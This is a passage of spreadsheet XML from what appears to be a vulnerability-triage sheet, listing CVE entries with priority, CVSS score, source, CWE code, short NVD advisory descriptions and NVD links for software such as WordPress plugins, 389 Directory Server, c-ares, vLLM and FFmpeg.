      <c r="S448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14957</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15406</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr"/>
      <c r="Q449" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R449"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custom-level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S449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15406</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15667</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr"/>
      <c r="Q450" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R450"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 The etn_manage_event capability is assigned to Contributors by default, meaning any Contributor-level user can set the malicious event_layout value via the REST API without any additional configuration.</t>
        </is>
      </c>
      <c r="S450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15667</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16960</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr"/>
      <c r="Q451" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>The Loops &amp; Logic WordPress plugin before 4.3.0 does not restrict its public template-data action to the data a visitor is permitted to see, allowing unauthenticated users to read arbitrary user records (including email addresses and roles) and arbitrary site options.</t>
        </is>
      </c>
      <c r="S451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16960</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17470</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr"/>
      <c r="Q452" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service due to a buffer overflow.</t>
        </is>
      </c>
      <c r="S452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17470</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18058</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr"/>
      <c r="Q453" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>The mobile Smart Connect dashboard UI was subject to manipulation
by 3rd party apps. When paired with a phishing attack, this manipulation could
result in escalated privileges of an attacker within the system.</t>
        </is>
      </c>
      <c r="S453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18058</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18453</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr"/>
      <c r="Q454" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in 389 Directory Server. A missing NULL pointer check in the paged results handling of op_shared_search allows an unauthenticated remote attacker to crash the LDAP server by sending a crafted sequence of search requests using the USE_ONE_BACKEND control, resulting in denial of service.</t>
        </is>
      </c>
      <c r="S454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18453</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22591</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3, Fast DDS’s implementation of SQL‑based content filtering (DDSSQLFilter) allows any participant in a DDS domain to remotely crash other Fast DDS participants by sending a single crafted SEDP `DATA` submessage whose `PID_CONTENT_FILTER_PROPERTY.filterExpression` contains a deeply nested filter expression. Versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3 fix the issue.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22591</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27462</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop returns different responses for valid/invalid usernames depending on multiple factors in the reset password mechanism, leading to user enumeration. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27462</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27490</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-330, CWE-331</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, inline images that are accessible without being authenticated are protected by a weak 24-bit pseudo-random secret. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27490</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30866</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, unauthenticated users can access uploaded sensitive via sniffed url. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30866</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33630</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>c-ares is an asynchronous resolver library. From ver 1.32.3 until 1.34.7, a use-after-free / double-free in c-ares' query-completion handling. The same flaw — a query's callback being invoked while the query is still linked in the channel's internal lookup structures — is present at multiple points in the resend/finish path (timeout handling, response handling, and query dispatch). If the query, or for ares_getaddrinfo() the owning host_query, is freed as a side effect of that callback, it is then accessed and/or freed a second time. This vulnerability is fixed in ver 1.34.7.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33630</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37198</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the SMF component of Open5GS v2.7.6 allows attackers to cause a Denial of Service (DoS) via supplying a crafted GTP packet.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37198</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37237</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>vLLM up to and including 0.17.0 allows remote attackers to cause a Denial of Service via memory exhaustion. The AsyncMediaIO.fetch_audio and AsyncMediaIO.fetch_image functions in multimodal/inputs.py fetch user-supplied media URLs using aiohttp and call r.read() without enforcing a maximum response size, allowing an attacker to exhaust server memory by providing a URL to an arbitrarily large file.</t>
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37237</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37736</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>An issue in the JsonSanitizer.sanitize() component of OWASP json-sanitizer v1.2.3 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37736</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38346</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the yuv2planeX_8_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38346</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38348</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libswscale/utils.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38348</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38349</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the hScale16To19_c() function (libswscale/output.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted image file.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38349</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38350</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
